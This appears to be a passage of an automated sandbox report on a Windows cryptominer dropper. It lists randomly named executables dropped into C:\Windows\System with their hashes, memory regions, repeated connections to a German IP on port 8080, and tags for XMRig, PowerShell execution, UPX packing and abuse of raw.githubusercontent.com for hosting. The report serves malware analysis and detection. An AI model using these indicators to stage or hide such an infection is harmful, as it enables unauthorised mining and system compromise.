C:\Windows\System\SrgnGPL.exe

C:\Windows\System\dnePJmN.exe

C:\Windows\System\dnePJmN.exe

C:\Windows\System\iAVSpbr.exe

C:\Windows\System\iAVSpbr.exe

C:\Windows\System\tNRatiA.exe

C:\Windows\System\tNRatiA.exe

C:\Windows\System\iJpdXJw.exe

C:\Windows\System\iJpdXJw.exe

C:\Windows\System\OXjlaol.exe

C:\Windows\System\OXjlaol.exe

C:\Windows\System\sIVmNLo.exe

C:\Windows\System\sIVmNLo.exe

C:\Windows\System\PYkcbYx.exe

C:\Windows\System\PYkcbYx.exe

C:\Windows\System\QWRVDhq.exe

C:\Windows\System\QWRVDhq.exe

C:\Windows\System\Ldmqouz.exe

C:\Windows\System\Ldmqouz.exe

C:\Windows\System\TsCMOSy.exe

C:\Windows\System\TsCMOSy.exe

Network

Country Destination Domain Proto
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp

Files

memory/2040-0-0x000000013FCD0000-0x00000001400C6000-memory.dmp

memory/2040-1-0x00000000001F0000-0x0000000000200000-memory.dmp

\Windows\system\AnfHbgG.exe

MD5 20580dcc41f03a489efd4fb99d0d33d6
SHA1 5113f1539fd73ef9d12e40f5109d916478333013
SHA256 ea13ee6cd7e1c9520ab7725826831fb1c3f2ca74017a4753c13b6affe59f2d06
SHA512 b5f92bb166b76619ef84575203150d3fa6d535ea4fd6f90fd70b638529e3caf21a70850027774249a96678bc1209a743726130735438a3276e04491a971d2689

memory/2040-8-0x000000013F1C0000-0x000000013F5B6000-memory.dmp

C:\Windows\system\owsTsek.exe

MD5 cb5aa066a12bc9f76d1d0bd6492d8f9e
SHA1 0ff7985d521c0285631d352dccdff29c35b6b0f8
SHA256 9c2d45499c60c0c9ee08eb9e7fddc8668e56e52e55950b8c89b95832b2e7260b
SHA512 6c16405253e18677591646969235ec29bba357d45f831c8f0cd1f76d1bb5ea8964f14069495ef1fb8e1901d5ef5eb9810e3198ecb0f95be83c834692273dbe24

C:\Windows\system\eXogIyX.exe

MD5 c46ad6a2d8411f0b6ea93172130e4c95
SHA1 b3004a506dfc375a7359d7957c14d422af519736
SHA256 5b3e57faa14e04bd31fc4cc06459aeec00dfb633fb246ebb570b02b27b4284d6
SHA512 1da16ad3aff8c4e540ba09168a21af5240e8a6d603c133ccb407883e6fc4ebb867b8b265b8f4e9e75620ebd6557cad932b93caa06861174f806f66c485dcd70c

C:\Windows\system\zoUXHGE.exe

MD5 b51da2acd8dd7f17a6affdc46831aed7
SHA1 7969872adf41e15eca7fb2d1981c97665975ce42
SHA256 60a55e92256bdd7ff80004e282279229442df7cca23bd19815c9cd2de22daabd
SHA512 57ab12835bb460bdaa33274e134ab6ceb7818759de8c647c8f6a16d5d125a0386486a29b2d4173e69eeb9365557bb014880981df02c20ee435fb2759f8e00338

memory/2040-22-0x0000000003260000-0x0000000003656000-memory.dmp

\Windows\system\fHAoOSG.exe

MD5 b91c5fc32b35549b73c862ab05b6b16c
SHA1 4b2956ba12f0a30b14e7b26763b7e84f55db9a00
SHA256 c8cd1108598166b927581e3a025d368c3262f04a19d60148a3d68006ba0a20f5
SHA512 c1b4307e93cd15bf2d001f55cb533e58177b55d450990570c5e8c249106f1ad7e3499bab675d7576f0406258ee4e43121e0c0b6094b50afe9c4721643284fe2e

\Windows\system\mCNwbnq.exe

MD5 94707ca042a260b4868bc62d2f596add
SHA1 a0f8021690792b33f3bb94685ee43d806c32311e
SHA256 18a83c7c4f125db2182ff699b6258e9535cd449f8df1a937eb8e99e56fb6a1b4
SHA512 271044ccb77d594a2189a55b0217d55eca50819ebee86a25f41a9e52c4af495f87ef7abd309ad39a7007048e91bb50e05439db1f1849894c713b872d6669a93e

C:\Windows\system\GujXmeB.exe

MD5 ac8b3adc9e0c0ec5e922619b77ebdab1
SHA1 e07da1fac95e76916abfef0c6c4442b17e24f345
SHA256 7d729fbbbfd5e86b4bcc9cb853ea49b787da88bb06b2df71ff1df1aac588f841
SHA512 dda1cc8da5e8de60b0de18de80e81d3e70acc15489ac6ba8220c79c1e8de0a644c90ca3e3a88594066f3a4e2cb6d4c79b9b480bae2ba66306b018897d8b03a5c

C:\Windows\system\LfHGfqB.exe

MD5 a8105ed080a672a87bb0fd0cc9ab95e5
SHA1 6ef34be0218348f70d538087cbfb70b989303909
SHA256 d856a10dd96a2974271d6a1638c24e1a77add210781823ca3cece5e5be773fbd
SHA512 626fbdd2cc4580c1e1befd9832c21581d54dc7c9ecf95f5c83fbc19eed90f3eef2c92a621f2f0e2e2af5007a7c957e9a7bba99c9fb43d0176c47f0b49ac5a046

memory/2968-69-0x000000013FDC0000-0x00000001401B6000-memory.dmp

memory/1728-72-0x000000001B7F0000-0x000000001BAD2000-memory.dmp

memory/2668-75-0x000000013F6F0000-0x000000013FAE6000-memory.dmp

memory/2696-76-0x000000013F970000-0x000000013FD66000-memory.dmp

memory/2040-74-0x0000000003260000-0x0000000003656000-memory.dmp

memory/2556-32-0x000000013FC40000-0x0000000140036000-memory.dmp

C:\Windows\system\EtFmAcE.exe

MD5 7827942cd77096afcd0cf3c13648f81d
SHA1 80c491b660fbb11d44d5adb61b1a58938e601786
SHA256 2de9b692e4ee7f2e1c78642b1f2896db9fce663268c007ade9aaa50e1fa268df
SHA512 2d475ee1941441510a15378ee678afa1815294aa21b02c73ef81fd7a4454f5e3ffe19f8b212ff0a87b00afca54ad8f1d3ee244a3a4f7219007311d760d31a4c6

memory/1728-93-0x0000000001E80000-0x0000000001E88000-memory.dmp

\Windows\system\QoMimGa.exe

MD5 0429b47c12b14711623bc0c3458c3d72
SHA1 4707373d6c735ace33cfd2e3f6e221d43470a8e7
SHA256 fc3a088f444e7e9b2573bae944b0d4fd33c122904415c43c274d9e11f1fa474c
SHA512 2b46d3d76d3ace8f24c069036dab24b3d374baeceede967e04d294a86557ef3574bf7ed874f06bc9c97c2fcbc770d5e3d0aa0da236a95eab2bf9dd6dec4429bb

memory/2040-59-0x0000000003260000-0x0000000003656000-memory.dmp

memory/2644-55-0x000000013F9D0000-0x000000013FDC6000-memory.dmp

C:\Windows\system\PsTqftB.exe

MD5 55a3a27f489da3b3df38d47a737598cc
SHA1 9b0cb6c1e57f94f5f4e825e29a85e072df01f573
SHA256 9650b65bd5b160a7d96db0197ebab8aeeade290998fdf0c242e40d5e6f4a462e
SHA512 7d3d645d06362b30326e4421aa8e365ae2135d552d88569cbb65d012a1e01b0fa60618a0892fc4952ccd67fd7cc9c0bf8ae6fe64c26b9db84242cc3cf91ecb58

memory/2040-41-0x0000000003260000-0x0000000003656000-memory.dmp

memory/2728-92-0x000000013FDE0000-0x00000001401D6000-memory.dmp

memory/2040-91-0x00000000036D0000-0x0000000003AC6000-memory.dmp

C:\Windows\system\pCPQzdl.exe

MD5 400edff2bb122c0de308cff30962ef0a
SHA1 b368c54b0b3746a940907c82ce38ee874cbf0226
SHA256 68c3e81f4fa09acd6734af383139b9ffb50af994988da89608b610130ee312d4
SHA512 8bea5fd630f633f214782396b213f5a4502fca5e370578e0b60859c6c02cf628f526d106f27834f7ea67d904199065e06dd552dc771cdd907366abf7ac38f689

memory/2888-73-0x000000013F5B0000-0x000000013F9A6000-memory.dmp

memory/2040-71-0x0000000003260000-0x0000000003656000-memory.dmp

memory/2040-70-0x000000013F7E0000-0x000000013FBD6000-memory.dmp

memory/2040-65-0x0000000003260000-0x0000000003656000-memory.dmp

C:\Windows\system\JgTbNdc.exe

MD5 c6879d46036c1345e24f8d1ad95633aa
SHA1 02844f2f4508b0dff897e360b17c1d57dd0bb2af
SHA256 80be7409b52f24f64105782640b3393d86498925a66adffdb527c971944df9f6
SHA512 a9b2e37d5ab343d2a15161bc2c08d039b9978cf6f83268d9af76c89212bef2539ed083772df8594abc70736f53ede1fc549b0e9151f07c52450617876958439f

C:\Windows\system\wxCpkpj.exe

MD5 affbaea90b62173f7fd5f3f12604e852
SHA1 4d9e21e253a18d0bc367f3e37d44f33b89228e71
SHA256 1e8ab3bc7bed9aaf16d73bc8e09b9347ccdb8a2c811d3042366491f290475296
SHA512 a7f97e3bb13249134e933a0ab651de809bebff5a30d0bd8b6f87525ed4fa71041581e376b15c554d9fe67f4b49819b268c61ba1220922f64eb45a365333c776e

C:\Windows\system\CeemIxU.exe

MD5 417ba611dc3e1d83c4485db56045f3aa
SHA1 5cb2fd14237c37d095292205ea680f680f51991e
SHA256 8a2abf3b8326eab9b9c826f6fa171974690dd7ec5a97d93a6d103383dc03c66e
SHA512 ee91ad189610dcc51150bedfdd5671ab92d6151f0c8bab262eb21b56f862e5785b5ad040a9e0311103b9eee99c9023efbbc61fdd205f102715dc9869924be8ec

\Windows\system\MbcGyDC.exe

MD5 3c6f0a72c2140b976716cba1e24ca2b7
SHA1 ac47deb9365c4750bf5fcd9a5561e16378ec4d66
SHA256 7adc95a0d1dd04e4658b4dee50156edc3f5551483f01db294738ff1788f99fa5
SHA512 fe63adbc06d98c89f002b620b204f4fae00e26c60e2ea11806a4ba53186b38ed14fb86a5d6884a70ead47a5e49ecc3cfa5cd7ab733c7899dd144ff0be3c82fec

C:\Windows\system\NdEjRIZ.exe

MD5 04335be3f22a7b398bff8be4335ed8e3
SHA1 9bca5e13b73eb84bdd8ffcb019a01c8f6bbbfe8d
SHA256 ad4a819418c54fea0267c0e5709a838842f9dd0e235bd75e53300a19348cc98c
SHA512 04e1f7e5c029ce7b2fab0480fe02a160c4cf1e5bf212f164ba292e64fd405a6b3d1315f5c233c504ae3cc9984e5458390e368ff524c1012edb9a0c245e6876da

C:\Windows\system\UjIBrcH.exe

MD5 9a77167b4e69a556cb1a3ccce6361e9a
SHA1 1e279435317f349aa3d77d0ed5a733629c7eaddf
SHA256 f2e3cf074fd20624160ee22e47d6bbd8c5930d7f98de0d165ae348b122b54708
SHA512 f18a7d61441db214f6f78f13c67cbeeacbf62000f3e8f27c1ed026f73a0877d70ebd98f3a10f25bfe9d14d37528142371d13cad96c8cd3bbbcb23f4107874c85

C:\Windows\system\FgPswQg.exe

MD5 f11439d9b72dbad137dadace83ecf99e
SHA1 0c4e8ec96ce788cf34ae2f35b29e3b926576bc82
SHA256 5be72d3e4687bbe7e38a12843ede637837793ead1937a6526b890dcf977c8731
SHA512 52c2c382e22967bdb226b39a17d607495d9de986a4ed111c09032e8617a614d807cf7fc3efff6c28d94d7f0a25809111bc1b03a0a367b7407f0339734c00b61f

\Windows\system\yMEECiQ.exe

MD5 cf96ad6edf572748137bfb490101756f
SHA1 8b44eca124f6276f372fdc5aa046411a5cccd931
SHA256 a1baa9a80e4ff007bd5be45648c20214a5422f7961e204b41c99afeb764249b4
SHA512 88f329a0735f91a5f4c088f84b68cb6fcdf0c92cb697ea997d17384f72876d5e1438a8d679c2ccc80f5c3d65fa64ae49f7b3c566cf9dfea28731c945b4089f2c

C:\Windows\system\HUagQUk.exe

MD5 5204291e2baec380f10753bd04d055a9
SHA1 08d5e347fed4764f9ad3acd29a4c32aaad4abd98
SHA256 163dac3dd1d1ebb25994c1201803ba3ab4374e6a21b7b838579be1bde3639f89
SHA512 8f74f7005803f437d882b5c4fd8df99b7efe441f1683bd28d483efeb043caba71c691e226b92bafe7e48c76f8b19eee2cb46e5c8e774d8d147e4d2ccb8d11302

C:\Windows\system\lkrNRcv.exe

MD5 de1b30eccf9db26567e1984df22be376
SHA1 c01318c6b4823a8e1e3638cf363a919fe754d3fc
SHA256 9836b1082f2efeda7dc95d31b732025f563cb589dd93f020d583e7dd90b3d7ee
SHA512 026c1037bb02133454defbdd3ad7d4bf570e4606c4e6f2dc19863e321c4da3c5433aace8ec76d0473933482a107c9d2be52869269afe156302a43ca49ba0602f

C:\Windows\system\BxqKKjn.exe

MD5 b91421b817111a7ef3eb30a69f38f81d
SHA1 72265a428f6082e73c8c4edc472c0153d712749f
SHA256 2a04222ebeb29977bbf645af7f45edb9e5c9c75e6f622942971ad8102b69ad16
SHA512 dc59e3bb826c14563dc2b4bfa27d2869c98678adc06364c74e8170ca2daea69808c979f6a34d90576db2a80d844487f0b818d7aacab0c54cc41253cfbf873e8a

\Windows\system\JGnUHnm.exe

MD5 51e82bc3bd7d2b3de855de7aae2a98ab
SHA1 bf6aa07f819d79297f7fc3fa09cc4818f4457b31
SHA256 119f59a52279d8cbc3a39015c40ff02e30803fcc581a40fcdcb3ff098ae74e92
SHA512 84e01a323d1afe07ab6c72853b4743ddc3ea1cbf200ee5aa823147a8b5bad8b8e0f7d27f66df51361ca14d860c8efec4e607ac6f367273f70333b7234a467eed

C:\Windows\system\Ylydjqo.exe

MD5 935e702069efaacb41da6a9b3bd2f0ef
SHA1 1a7c3ed4a9e9fc03f98e3117b5441297d70dbac6
SHA256 6987b730d88c826d9d81416e30e528fea8b7fbe60d1fa29286e0d102dea179db
SHA512 e1a1216857de6ac824d122c680ac8fdd39da60e0f0c63f5ed8782f9013e12f08598bb4e6d773b3eb7dc6f521846cec9faf049f0a24320c520f5778cc24973c26

\Windows\system\wPEjBHG.exe

MD5 386599a823edc14fb0a2d9db864f2f8c
SHA1 d70f7079d415ede6e6968a84dc93ffd926ac9a6d
SHA256 6a1636c0bf449c8bf513bb2cdde039000c4335dd291b92052c59e43c1dfa98d9
SHA512 9d851cb93509713cc21f95421b806a2ac0402006dea9393d2f69b97c6ebe0c62b1e81a2df699660eb1f3f78ce5f02341938f782cdc7413f78a9c9a7597234cd9

C:\Windows\system\sXmCKGJ.exe

MD5 85df39f8ebf08c38e72c9da86a06fed3
SHA1 b9ffe25d21d8d9b17aec033d4b37a87ea24c9491
SHA256 03564febf46467d27be49aa30c6264335c35ec4f3318369078623bfc9cc00055
SHA512 7d37378d96c1740ecd52439530006ec0255ee8a754f975ad34951b85e0ba67467c2cebc1223a3f2a3cc57e2501b237a37efec20d1b7231906ee8ca8dfc47096d

C:\Windows\system\sjWpTAq.exe

MD5 817663d19c6f0271810e623fb823a753
SHA1 99764d61a569975026e5cc442263cfec904abad9
SHA256 f361d6a75027200499189abbd4b40fc19e5878365a8cb7d1fedeab81d5dcc493
SHA512 4489e8955599aae712149c1c6194dc975522a8cd3edd81feadaa39238388391be14f9156de02fed0671f1dca5d8b2c93a17971f9e31354c2f13cad72395d4380

\Windows\system\twBhife.exe

MD5 a08449c6fa606ed92b76a7196d6113d1
SHA1 85f064b6d5b2fb25556b54fdafbf641689549a97
SHA256 55cd11e82d353855958788b15d2ad982250627ed91a67f358d3b8d4f1ff11c84
SHA512 f3fedb70e387eab5876bcb63bb3f1f51416f7f2147973b2be527dcfc598d1f5f7b93fbae6218700e7f6192339ef0ddb2b526cc8a9ba16606f5132bd55dee2782

C:\Windows\system\yrmfvbe.exe

MD5 fad8771b44b4c2023f8b3be259a1f2ab
SHA1 723d5b29c01166b2371f125210c53336b1d3054d
SHA256 a3a582bc7503797fb6c2a31a0e6f73583fc6d0221b00d48374268d273aa4b734
SHA512 edacb1d5ac4b6bd4200c5e3997f97f3ce6f6a23073d40888fd2a0dd4b87c194cbec51660e2ff3581bfa341718f67152b12ce14487a6a225da3406fcd060e8369

C:\Windows\system\iDYIyrC.exe

MD5 cce0a6104400395297cc84afc75de202
SHA1 1ee2e0f139acb5536ef69911148c47a4ac5dccd2
SHA256 95aeefed63adbaa3afaaf364f5a63d3d464ad914ef3b9a1c055fc2457305a0f6
SHA512 2c24be4424101067968766b9de9a2d5554b01328a8aaa198d17dd06a8e32030f84d1f68b0477a7188e3a8f73bcc00718fa35d35cd14d80806bf0cc12f67c0847

C:\Windows\system\FfrtHjS.exe

MD5 7e70d64eed9fc597271995361b5ced54
SHA1 c5a3cd5f632e2408085db7b05e509f4c4f78fe32
SHA256 563a709af7166d710daf9b7b71ee71e7adfed4a89c67d5a71bfe4eed0a741f52
SHA512 601e600e8b3ece1f8bfbb300eedf297487748d1577f8c8b28512f693ae4252d9175b8b8ad125dbb3c2c23823bd3b77b76202abdb485bc07c992bf21673951d68

memory/2040-84-0x000000013F020000-0x000000013F416000-memory.dmp

memory/2460-83-0x000000013FFC0000-0x00000001403B6000-memory.dmp

memory/2488-82-0x000000013F7E0000-0x000000013FBD6000-memory.dmp

memory/2040-81-0x000000013F5B0000-0x000000013F9A6000-memory.dmp

C:\Windows\system\GQckUAj.exe

MD5 e958ef22bd957dbf01a0f9b14127c4ff
SHA1 8d52bd044bbba0810e91fb405ce399e7ef95eab2
SHA256 902fb5d2ff4dc4e053e545e0d54fc8ba327715ad89721f914e584842f2b02ccb
SHA512 33c87fde9ad97ed40e9c23cde69855e7a70436da4eb94c51ec2570eae1ac89e3c25ce16962dab8fd0506cdce38b799a32ea03d98e1d84cf4f22c08321ede31ff

memory/2040-28-0x0000000003260000-0x0000000003656000-memory.dmp

memory/2524-14-0x000000013FF60000-0x0000000140356000-memory.dmp

memory/2384-13-0x000000013F1C0000-0x000000013F5B6000-memory.dmp

memory/2040-3552-0x000000013FCD0000-0x00000001400C6000-memory.dmp

memory/2556-3569-0x000000013FC40000-0x0000000140036000-memory.dmp

memory/2524-3565-0x000000013FF60000-0x0000000140356000-memory.dmp

memory/2040-5809-0x000000013F7E0000-0x000000013FBD6000-memory.dmp

memory/2668-7120-0x000000013F6F0000-0x000000013FAE6000-memory.dmp

memory/2968-7126-0x000000013FDC0000-0x00000001401B6000-memory.dmp

memory/2888-7141-0x000000013F5B0000-0x000000013F9A6000-memory.dmp

memory/2728-7204-0x000000013FDE0000-0x00000001401D6000-memory.dmp

memory/2040-7592-0x00000000036D0000-0x0000000003AC6000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-22 21:21

Reported

2024-05-22 21:23

Platform

win10v2004-20240426-en

Max time kernel

142s

Max time network

134s

Command Line

"C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe"

Signatures

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Windows\System\AnfHbgG.exe N/A
N/A N/A C:\Windows\System\owsTsek.exe N/A
N/A N/A C:\Windows\System\eXogIyX.exe N/A
N/A N/A C:\Windows\System\mCNwbnq.exe N/A
N/A N/A C:\Windows\System\zoUXHGE.exe N/A
N/A N/A C:\Windows\System\PsTqftB.exe N/A
N/A N/A C:\Windows\System\fHAoOSG.exe N/A
N/A N/A C:\Windows\System\LfHGfqB.exe N/A
N/A N/A C:\Windows\System\JgTbNdc.exe N/A
N/A N/A C:\Windows\System\GujXmeB.exe N/A
N/A N/A C:\Windows\System\EtFmAcE.exe N/A
N/A N/A C:\Windows\System\QoMimGa.exe N/A
N/A N/A C:\Windows\System\pCPQzdl.exe N/A
N/A N/A C:\Windows\System\wxCpkpj.exe N/A
N/A N/A C:\Windows\System\GQckUAj.exe N/A
N/A N/A C:\Windows\System\FfrtHjS.exe N/A
N/A N/A C:\Windows\System\CeemIxU.exe N/A
N/A N/A C:\Windows\System\twBhife.exe N/A
N/A N/A C:\Windows\System\sXmCKGJ.exe N/A
N/A N/A C:\Windows\System\BxqKKjn.exe N/A
N/A N/A C:\Windows\System\iDYIyrC.exe N/A
N/A N/A C:\Windows\System\lkrNRcv.exe N/A
N/A N/A C:\Windows\System\MbcGyDC.exe N/A
N/A N/A C:\Windows\System\HUagQUk.exe N/A
N/A N/A C:\Windows\System\NdEjRIZ.exe N/A
N/A N/A C:\Windows\System\wPEjBHG.exe N/A
N/A N/A C:\Windows\System\Ylydjqo.exe N/A
N/A N/A C:\Windows\System\FgPswQg.exe N/A
N/A N/A C:\Windows\System\yrmfvbe.exe N/A
N/A N/A C:\Windows\System\yMEECiQ.exe N/A
N/A N/A C:\Windows\System\UjIBrcH.exe N/A
N/A N/A C:\Windows\System\JGnUHnm.exe N/A
N/A N/A C:\Windows\System\sjWpTAq.exe N/A
N/A N/A C:\Windows\System\xDaBvJd.exe N/A
N/A N/A C:\Windows\System\rRfBZuB.exe N/A
N/A N/A C:\Windows\System\YYDrhEA.exe N/A
N/A N/A C:\Windows\System\bsujjfH.exe N/A
N/A N/A C:\Windows\System\CQjGAsF.exe N/A
N/A N/A C:\Windows\System\eUPoQiD.exe N/A
N/A N/A C:\Windows\System\ccFKPOh.exe N/A
N/A N/A C:\Windows\System\hDBPigV.exe N/A
N/A N/A C:\Windows\System\VzLcBEM.exe N/A
N/A N/A C:\Windows\System\UzlVdGz.exe N/A
N/A N/A C:\Windows\System\KOXCViW.exe N/A
N/A N/A C:\Windows\System\yYftVVC.exe N/A
N/A N/A C:\Windows\System\ZTOLzJI.exe N/A
N/A N/A C:\Windows\System\gCrppZa.exe N/A
N/A N/A C:\Windows\System\AAgDeVs.exe N/A
N/A N/A C:\Windows\System\kAGLSmM.exe N/A
N/A N/A C:\Windows\System\JFSYXbF.exe N/A
N/A N/A C:\Windows\System\VHOFmHS.exe N/A
N/A N/A C:\Windows\System\ayreXaa.exe N/A
N/A N/A C:\Windows\System\JQbBOgN.exe N/A
N/A N/A C:\Windows\System\TipIUwj.exe N/A
N/A N/A C:\Windows\System\nfrOFFx.exe N/A
N/A N/A C:\Windows\System\KqAsbVL.exe N/A
N/A N/A C:\Windows\System\YNMJoSy.exe N/A
N/A N/A C:\Windows\System\MszExGN.exe N/A
N/A N/A C:\Windows\System\wGlbRCV.exe N/A
N/A N/A C:\Windows\System\NKdSxoQ.exe N/A
N/A N/A C:\Windows\System\ZbzMgRZ.exe N/A
N/A N/A C:\Windows\System\MRpCmAM.exe N/A
N/A N/A C:\Windows\System\oDFNSCe.exe N/A
N/A N/A C:\Windows\System\yohaepY.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\System\eAVUvRx.exe C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
File created C:\Windows\System\lFZFODD.exe C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
File created C:\Windows\System\wXYAmYF.exe C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
File created C:\Windows\System\rDlsogt.exe C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
File created C:\Windows\System\KUNesOH.exe C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
File created C:\Windows\System\dQmBoZs.exe C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
File created C:\Windows\System\ymDGqzm.exe C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
File created C:\Windows\System\spUQZIp.exe C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
File created C:\Windows\System\uVMYGBc.exe C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
File created C:\Windows\System\WfIhvwN.exe C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
File created C:\Windows\System\KaEKpZW.exe C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
File created C:\Windows\System\YmLwkha.exe C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
File created C:\Windows\System\TdnBXaH.exe C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
File created C:\Windows\System\lTbpFIA.exe C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
File created C:\Windows\System\zoExuOH.exe C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
File created C:\Windows\System\rEuWOWx.exe C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
File created C:\Windows\System\sjWpTAq.exe C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
File created C:\Windows\System\zIyArSa.exe C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
File created C:\Windows\System\KtLmzjG.exe C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
File created C:\Windows\System\yDcEXTq.exe C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
File created C:\Windows\System\icoNetS.exe C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
File created C:\Windows\System\vBzGNPl.exe C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
File created C:\Windows\System\OTyoZim.exe C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
File created C:\Windows\System\avRMcOH.exe C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
File created C:\Windows\System\KScHVbv.exe C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
File created C:\Windows\System\TaHUosX.exe C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
File created C:\Windows\System\kzqKqBt.exe C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
